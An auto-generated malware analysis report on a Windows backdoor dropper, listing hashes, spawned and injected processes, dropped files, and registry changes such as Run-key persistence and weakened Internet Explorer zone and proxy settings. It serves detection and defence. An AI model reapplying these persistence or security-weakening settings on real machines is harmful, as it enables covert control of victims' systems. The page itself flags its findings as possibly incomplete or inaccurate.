Gen.Variant.Hiloti.2_6df0f423fb

by malwarelabrobot on September 5th, 2016 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Hiloti.2 (AdAware), Backdoor.Win32.PcClient.FD, Tdl4.YR (Lavasoft MAS)
Behaviour: Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6df0f423fb672c7925de87b12e214f89
SHA1: 2b78a0aecaa05fddb086e7d44e3456642aeca3ea
SHA256: 7748f74d9408edfecf69d59f1ca5dadc74219d08ba81db98ac9529b9419c275e
SSDeep: 12288:xSMufrmvhQwQ0C9NlVC5doYdX5Ywljpu8fMVgADHm:SzmvhLHqNXC5Ndp9XOG
Size: 534929 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-02-21 21:46:23
Analyzed on: WindowsXP SP3 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

4IR.exe:612
sc.exe:1304
sc.exe:492
1EuroP.exe:1524
2gansta.exe:1532
net1.exe:584
net1.exe:1604
3IC.exe:1112
net.exe:304
net.exe:2032
rundll32.exe:340
runonce.exe:396
%original file name%.exe:556
Rundll32.exe:132
grpconv.exe:1484
5tbp.exe:1264

The Backdoor injects its code into the following process(es):

lnhz9.exe:352
lnhz9.exe:220
rundll32.exe:636
Explorer.EXE:532
svchost.exe:1084
spoolsv.exe:1424

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 4IR.exe:612 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\mdinstall.inf (426 bytes)
%Documents and Settings%\%current user%\Application Data\MouseDriver.bat (103 bytes)
%Documents and Settings%\%current user%\Application Data\0s70t3ayy.bat (142 bytes)
%Documents and Settings%\%current user%\Application Data\lnhz9.exe (55 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\mdinstall.inf (0 bytes)

The process 1EuroP.exe:1524 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Scv..bat (168 bytes)

The process 3IC.exe:1112 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (673 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (0 bytes)

The process %original file name%.exe:556 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (11920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\2gansta.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5tbp.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\3IC.exe (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\1EuroP.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\4IR.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\cb.exe (3 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsj1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\2gansta.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5tbp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\3IC.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\1EuroP.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\4IR.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\cb.exe (0 bytes)

The process 5tbp.exe:1264 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%WinDir%\msdnih.dll (118 bytes)

Registry activity

The process 4IR.exe:612 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\tgs90gv74r]
"tgs90gv74rpath" = "%Documents and Settings%\%current user%\Application Data\"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\tgs90gv74r]
"tgs90gv74rexepath" = "%Documents and Settings%\%current user%\Application Data\lnhz9.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2F DA D1 DE 91 2F 0C 80 D2 C2 0D C8 DF E6 3F"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\4IR\DEBUG]
"Trace Level" = ""

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ez88" = "%Documents and Settings%\%current user%\Application Data\lnhz9.exe"

The Backdoor deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\4IR\DEBUG]
"Trace Level"

The process sc.exe:1304 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C D6 54 D6 92 1B 4A 21 A6 D4 56 67 2B 7F 9A 04"

The process sc.exe:492 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 2C 22 C1 6E 24 D0 A5 BC 92 AA 49 BA 62 79 73"

The process 1EuroP.exe:1524 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\]
"1806" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 21 5B 76 D2 4E B9 EE 17 2C 30 8C C8 5D DF 25"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process 2gansta.exe:1532 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 F4 ED D0 AA 5C F7 E6 80 58 1B 43 64 47 9C 28"

The process net1.exe:584 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 8C 3D 6F 00 DC AE D8 04 9C 08 56 79 F7 0F 1E"

The process net1.exe:1604 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 89 87 1F 6B D8 AF FE 05 30 AE 14 0A 5B E6 F7"

The process 3IC.exe:1112 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 62 5A DD E1 87 1B E8 DC D0 5F DF 2A 61 18 0A"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\1EuroP.exe, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\3IC.exe, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\4IR.exe, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\5tbp.exe, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\7.tmp,"

The process net.exe:304 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 84 04 04 B6 0E 17 5E BD 15 AE 0B 77 F2 50 54"

The process net.exe:2032 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 9E 0D 06 77 8D 5C D7 DA 78 D7 AD C2 73 BD 97"

The process lnhz9.exe:352 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\lnhz9\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 9B 19 06 C4 1E 18 9D C3 E5 AD F4 55 63 BB 69"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\lnhz9\DEBUG]
"Trace Level"

The process lnhz9.exe:220 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 16 39 4D 2B E3 24 63 3C 6F 6D 70 93 F5 8F BA"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:340 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C E0 B6 F9 C9 D1 F0 FD C5 26 AE 2E 72 99 C2 10"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Wtube]
"Bveqayeweci" = "43 01 38 03 58 05 51 07 41 09 44 0B 48 0D 41 0F"

The process rundll32.exe:636 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 2B 68 3C F6 94 9A F5 B7 D9 8D E8 3A B4 C1 42"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Wtube]
"Eqegaqojoqoka" = "196"

To automatically run itself each time Windows is booted, the Backdoor adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Ihoragiqinicim" = "rundll32.exe %WinDir%\msdnih.dll,Startup"

The process runonce.exe:396 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 CE 07 46 11 29 02 59 B5 4B F9 8D B7 41 D4 2F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

